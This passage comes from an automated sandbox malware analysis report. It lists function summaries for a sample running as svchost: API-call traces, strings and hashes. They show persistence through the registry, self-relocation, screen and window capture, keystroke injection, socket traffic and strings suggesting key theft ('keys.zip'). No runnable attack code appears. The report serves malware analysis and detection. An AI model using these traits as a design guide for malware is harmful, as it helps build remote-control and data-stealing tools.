                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},00000006), ref: 02CB43D2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB43D9
                                                                                                                                                                                                                • Part of subcall function 02C97310: GetHandleInformation.KERNEL32(?,00000000), ref: 02C97324
                                                                                                                                                                                                                • Part of subcall function 02C97310: CloseHandle.KERNEL32(?), ref: 02C97335
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$Descriptor$BackslashHandleMutexPath$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2697826820-558722157
                                                                                                                                                                                                              • Opcode ID: 5ba69828c16b8b6ef4bddde76345d79659ba20a1e3eb54d00ef9a36686b77458
                                                                                                                                                                                                              • Instruction ID: 6c7faf4e59314a4d530ac6681cec801a88241290f3e5ae3abbccecf570d2b07a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ba69828c16b8b6ef4bddde76345d79659ba20a1e3eb54d00ef9a36686b77458
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6413F34D487594FCF2BCB28A8747EA7BE5AF8A300F1845D4D98ED7241DB719648C781
                                                                                                                                                                                                              Function 02CAC110 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\private\), ref: 02CAC139
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAC0E0,00000000,00000000,00000000), ref: 02CAC186
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\public\), ref: 02CAC19E
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CAC0C0,00000000,00000000,00000000), ref: 02CAC1E2
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAC1FA
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAC20B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                              • String ID: \private\$\public\
                                                                                                                                                                                                              • API String ID: 677819612-281496920
                                                                                                                                                                                                              • Opcode ID: e516d306b13a510ae03040569b9ccbe5f6002f741138d775d7b0f3d236548d46
                                                                                                                                                                                                              • Instruction ID: 1a526dbb2db4efb8062891d8c8003dff77a703adbd82e3708761da102aaba7af
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e516d306b13a510ae03040569b9ccbe5f6002f741138d775d7b0f3d236548d46
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97310631A81316EFEB314A64DC25B563B949B89F9CF044322FA02AE2C0C3B49744CBD4
                                                                                                                                                                                                              Function 02C96980 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 81registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C969A2
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C969C0
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000104), ref: 02C969DD
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C96A4D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,5DD2BAAFa,00000000,00000001,?,00000104), ref: 02C96A6F
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C96A7D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 1287607259-2040404611
                                                                                                                                                                                                              • Opcode ID: 512a03eedbfed5836459eef29464b1e59557137ae3da5367ff7ca2970b3b9b1c
                                                                                                                                                                                                              • Instruction ID: a312e0355d3829bf86cedd23640dd520dc4254c15f6d528052422811d419cf73
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 512a03eedbfed5836459eef29464b1e59557137ae3da5367ff7ca2970b3b9b1c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621B5B1941208ABEB14DB64DCC9FEE77BCEF18704F6085A9E285D6181E7B09EC48B50
                                                                                                                                                                                                              Function 02C9E250 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongA.USER32(02C9CE3A,000000F0), ref: 02C9E26B
                                                                                                                                                                                                              • GetLastActivePopup.USER32(02C9CE3A), ref: 02C9E279
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C9E293
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C9E296
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 02C9E2AC
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000004), ref: 02C9E2B5
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 02C9E2EE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 3748940024-4251816714
                                                                                                                                                                                                              • Opcode ID: c141c25b0b44426cad97fb2935ff14dab0fe99492b45f6dc8ac844949a4b7e55
                                                                                                                                                                                                              • Instruction ID: e7b7ace51ba198d0232889dc84ec895b6e199be12d9d9efc563812fd75c26274
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c141c25b0b44426cad97fb2935ff14dab0fe99492b45f6dc8ac844949a4b7e55
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C110872A4062862DF31EA9D9C8CFAFB35CAF90355F400627FA05E7190DB60965187E5
                                                                                                                                                                                                              Function 02C9F6C0 Relevance: 13.9, APIs: 11, Instructions: 158memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemcpy$AllocProcessmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1327414625-0
                                                                                                                                                                                                              • Opcode ID: 4e62e163733f55bee3731dae61bdc10172abfe8b022d7397a8fb6e7fd464109b
                                                                                                                                                                                                              • Instruction ID: bd7fa3802cb9f5430767d31614f6ddb078a4e057b574018fbb7675ce2585c97d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e62e163733f55bee3731dae61bdc10172abfe8b022d7397a8fb6e7fd464109b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E751A576E00315AFCF21CFA8C888BAE7BF9EF85340F644559E945E7600D771AA44CBA0
                                                                                                                                                                                                              Function 02C9F000 Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 247COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02C9FCE7,00000000,?,02C9FCE7,,-059BF5C8,00000000,00000000,02C9FCE7,?), ref: 02C9F0CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                              • API String ID: 0-1412996494
                                                                                                                                                                                                              • Opcode ID: 24ac6dc93036a74f08cb666f5652c1efb8c1cfbc9e6f24008b1f33c6bf3555f2
                                                                                                                                                                                                              • Instruction ID: cea17d452b7bc535c89f3ef317404b71ba1c6fe03164c84bc2e69f700ac6d82a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24ac6dc93036a74f08cb666f5652c1efb8c1cfbc9e6f24008b1f33c6bf3555f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45712935A00205ABEF24CE68CC49BAE7FADDF95318F24946EE845D7A40E771DA41CBD0
                                                                                                                                                                                                              Function 02C929A0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexitfree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3367576030-0
                                                                                                                                                                                                              • Opcode ID: 142a8971e488061fa5ae4325c91eb7dd66a740e6ed9b296e12cde4b56b51c37b
                                                                                                                                                                                                              • Instruction ID: b5b1a8aeaa8f76fa2d0b65f66f0178c7f4e18ebbe1492840ee24bf31c07478ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 142a8971e488061fa5ae4325c91eb7dd66a740e6ed9b296e12cde4b56b51c37b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37618EB1A01609BFDF20CF68C884BAE77A8FF88754F104459ED8697340D770EA51CBA2
                                                                                                                                                                                                              Function 02C9C310 Relevance: 13.6, APIs: 9, Instructions: 120synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WindowFromDC.USER32(?), ref: 02C9C31C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9C354
                                                                                                                                                                                                              • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C9C362
                                                                                                                                                                                                              • GetClipRgn.GDI32(?,00000000), ref: 02C9C36C
                                                                                                                                                                                                              • SelectClipRgn.GDI32(00000000,00000000), ref: 02C9C37C
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C9C383
                                                                                                                                                                                                              • GetViewportOrgEx.GDI32(?,?), ref: 02C9C38E
                                                                                                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C9C3A2
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9C3E3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3315380975-0
                                                                                                                                                                                                              • Opcode ID: 523c09f202c5f0abc56152b11e9d6730d986f80c92533c568925c9122a719702
                                                                                                                                                                                                              • Instruction ID: cd5a0abcdfd65260c0ca16c2e6ac79e36a5588b73ba1374fe2e78460c8ae49cb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 523c09f202c5f0abc56152b11e9d6730d986f80c92533c568925c9122a719702
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5841FAB6641205AFCB14CF99DC88EAB77BDFB8C751B408A09FA19D7240D734E950CBA0
                                                                                                                                                                                                              Function 004012B0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2787354276-0
                                                                                                                                                                                                              • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                              Function 02C99340 Relevance: 13.6, APIs: 9, Instructions: 52synchronizationsleepthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 02C99350
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(00000000,00000000), ref: 02C98F3A
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteObject.GDI32(00000000), ref: 02C98F49
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteDC.GDI32(00000000), ref: 02C98F57
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(?,00000000), ref: 02C98F67
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteObject.GDI32(00000000), ref: 02C98F6F
                                                                                                                                                                                                                • Part of subcall function 02C98F20: DeleteDC.GDI32(?), ref: 02C98F78
                                                                                                                                                                                                                • Part of subcall function 02C98F20: GetDC.USER32(00000000), ref: 02C98F7C
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleDC.GDI32(00000000), ref: 02C98F8B
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleDC.GDI32(00000000), ref: 02C98F93
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C98FB4
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(?,00000000), ref: 02C98FC3
                                                                                                                                                                                                                • Part of subcall function 02C98F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02C98FDE
                                                                                                                                                                                                                • Part of subcall function 02C98F20: SelectObject.GDI32(00000000,00000000), ref: 02C98FFD
                                                                                                                                                                                                                • Part of subcall function 02C98F20: ReleaseDC.USER32(00000000,00000000), ref: 02C9900C
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02C9937C
                                                                                                                                                                                                              • GetTopWindow.USER32(00000000), ref: 02C9938B
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9939E
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000005), ref: 02C993B4
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 02C993B7
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02C993C6
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000000), ref: 02C993CF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02C993DB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4064958368-0
                                                                                                                                                                                                              • Opcode ID: 8d23d554f9257485382384f8ebbc0afcde0b724762cbee5b0cbd48e02c0982bf
                                                                                                                                                                                                              • Instruction ID: 193d02fdb77f73fb2590138a39eb4fabd73c26feb5347350e45c55191c6a352f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8d23d554f9257485382384f8ebbc0afcde0b724762cbee5b0cbd48e02c0982bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD115BB5D82205ABCF10AB79EC8CF1B37ACAB497507404F08B515CB2C0DA70E920CFA4
                                                                                                                                                                                                              Function 00402FF0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,753CE610,00402FDE), ref: 0040300F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,753CE610,00402FDE), ref: 0040302B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2629017576-0
                                                                                                                                                                                                              • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                              Function 02CA9A00 Relevance: 12.1, APIs: 8, Instructions: 98networkstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E44,00000002,00000000), ref: 02CA9A2A
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000002,00000000), ref: 02CA9A4E
                                                                                                                                                                                                              • recv.WS2_32(?,00000001,?,00000000), ref: 02CA9A7C
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000001,00000000), ref: 02CA9AA0
                                                                                                                                                                                                              • recv.WS2_32(?,?,?,00000000), ref: 02CA9AC5
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(02CDFCA8,00000001,?,00000000), ref: 02CA9AED
                                                                                                                                                                                                              • lstrcmpA.KERNEL32(02CDFBA0,?,?,00000000), ref: 02CA9AFF
                                                                                                                                                                                                              • send.WS2_32(?,02CD9E48,00000002,00000000), ref: 02CA9B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: recv$lstrcmpsend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1090895577-0
                                                                                                                                                                                                              • Opcode ID: d9c4c928ed15965bef91b3bcfcc7144a93a954beb8acd5c704252e815d0f0e56
                                                                                                                                                                                                              • Instruction ID: b6e31b6f60ad993afc7fed899245009d5e9a8b4e50f3610d8dc03a418964e075
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9c4c928ed15965bef91b3bcfcc7144a93a954beb8acd5c704252e815d0f0e56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9231AF71A4525A39EB3196645C52FFEB77C9FC5704F1042C5E6449A141D3B09B478BA0
                                                                                                                                                                                                              Function 02C99BE0 Relevance: 10.7, APIs: 7, Instructions: 167synchronizationwindowkeyboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99C41
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000000,00000000), ref: 02C99C5F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99D2F
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?,?), ref: 02C99D51
                                                                                                                                                                                                              • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02C99D98
                                                                                                                                                                                                              • SendMessageW.USER32(?,?,00000003,00000000), ref: 02C99DBE
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,?,?), ref: 02C99DCB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                              • String ID:
